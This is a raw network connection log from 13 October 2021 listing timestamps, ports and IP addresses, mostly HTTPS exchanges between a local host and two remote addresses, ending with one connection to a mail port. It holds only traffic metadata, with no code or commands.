Oct 13, 2021 13:06:37.708342075 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:37.709140062 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:37.709300995 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:37.719927073 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:37.761863947 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:38.052058935 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:38.052164078 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:38.052396059 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:38.052402973 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:38.052436113 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:38.052675962 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:38.063656092 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:38.063704014 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:38.140450001 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.140464067 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.140631914 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.140964031 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.140973091 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.174247980 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.174387932 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.174392939 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.174874067 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.175054073 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.181252003 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.181395054 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.181525946 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.181874037 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.225954056 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.435139894 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.435360909 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.435621977 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.435841084 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.435873985 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.435888052 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.436342955 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.436593056 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.437740088 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.437948942 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.437979937 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.438002110 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.438277006 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.438545942 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.438764095 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.438801050 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.439035892 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.445163012 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.445365906 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.445384026 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.445543051 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.445632935 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.445650101 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.445832968 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.445838928 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.446338892 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.446573019 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.446588039 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.446907043 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.447048903 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.447278023 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.447293997 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.447484970 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.447705984 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.447942972 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.447962046 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.448196888 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.448362112 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.448539019 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.448558092 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.448776960 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.449063063 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.449290991 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.449306011 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.449529886 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.449748039 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.449991941 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.450006008 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.450167894 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.450514078 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.450710058 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.450721979 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.451061964 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.451143980 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.451339960 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.451353073 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.451606989 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.452054977 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.452241898 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.452256918 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.452433109 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.452645063 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.452744007 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.452886105 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.452908993 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.453063011 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.453195095 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.453280926 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.453501940 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.453517914 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.453726053 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.453918934 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.454176903 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.454199076 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.454433918 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.454668045 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.454874039 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.454895973 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.455048084 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.455725908 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.455857038 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.455952883 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.455974102 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.456103086 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.456218958 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.456275940 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.456294060 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.456470013 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.456486940 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.456676960 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.456684113 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.457087040 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.457217932 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.457228899 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.457242966 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.457454920 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.457478046 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.457680941 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.457948923 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.458151102 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.458178997 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.458359957 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.458374023 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.458388090 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.458646059 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.458659887 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.458671093 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.458839893 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.459049940 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.459228992 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.459249020 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.459265947 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.459438086 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.459600925 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.459614992 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.459619045 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.459841967 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.459965944 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.460119009 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.460197926 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.460211039 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.460222006 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.460375071 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.460565090 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.460977077 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.461118937 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.461143017 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.461222887 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.461390018 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.461406946 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.461410999 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.461621046 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.461915016 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.462083101 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.462146997 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.462261915 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.462281942 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.462287903 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.462435007 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.462441921 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.462779045 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.462927103 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.462954044 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.462970018 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.463191986 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.463217974 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.463500977 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.463721037 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.463885069 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.463921070 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.463937998 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.464145899 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.464164972 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.464340925 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.464484930 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.464649916 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.464715958 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.464725018 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.464740992 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.464900970 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.464915991 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.464926958 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.465269089 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.465363979 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.465516090 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.465543032 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.465563059 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.465679884 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.465768099 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.465958118 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.465974092 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.465980053 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.466311932 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.466336012 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.466439962 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.466521025 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.466542959 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.466557980 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.466705084 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.466744900 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.466783047 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.466938019 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.466959953 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.466965914 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467129946 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467190981 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.467228889 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467248917 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.467420101 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467446089 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.467514992 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467538118 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.467678070 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.467753887 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467770100 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467787027 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.467931032 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467943907 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.467957973 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.467977047 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.468137026 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.468195915 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.468333006 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.468353033 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.468358994 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.468513966 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.468609095 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.468631029 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.468775988 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.468801022 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.468818903 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.468969107 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.468986988 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.469002008 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469094992 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469258070 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.469281912 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469289064 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.469419956 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.469531059 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469578028 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.469598055 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469763041 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.469788074 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469794035 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.469806910 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469948053 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.469981909 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.470001936 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470175028 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.470197916 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470351934 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.470371962 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470379114 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.470392942 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470520973 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470704079 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.470729113 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470736027 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.470853090 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470917940 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.470993996 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.471014023 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.471020937 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.471154928 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.471328974 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.471349001 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.471488953 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.471524000 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.471615076 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.471700907 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.471712112 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.471726894 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.471872091 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.471896887 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.471904039 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472019911 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.472029924 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472053051 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.472223997 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472259998 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.472414017 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472438097 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.472444057 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472453117 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.472455978 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472589970 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.472768068 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472793102 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.472800016 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.472944021 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473045111 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473067045 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473140001 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473257065 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473325014 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473334074 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473356009 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473507881 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473532915 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473540068 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473552942 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473702908 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473723888 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473742008 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.473901033 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473917007 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.473933935 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.474045992 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.474093914 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.474117041 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.474251986 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.474280119 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.474428892 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.474452019 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.474478006 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.474625111 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.474757910 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:06:38.474828959 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.474845886 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.474854946 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.475022078 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.475048065 CEST	49756	443	192.168.11.20	142.250.185.161
Oct 13, 2021 13:06:38.475080967 CEST	443	49756	142.250.185.161	192.168.11.20
Oct 13, 2021 13:08:14.310081005 CEST	49768	587	192.168.11.20	188.93.227.195
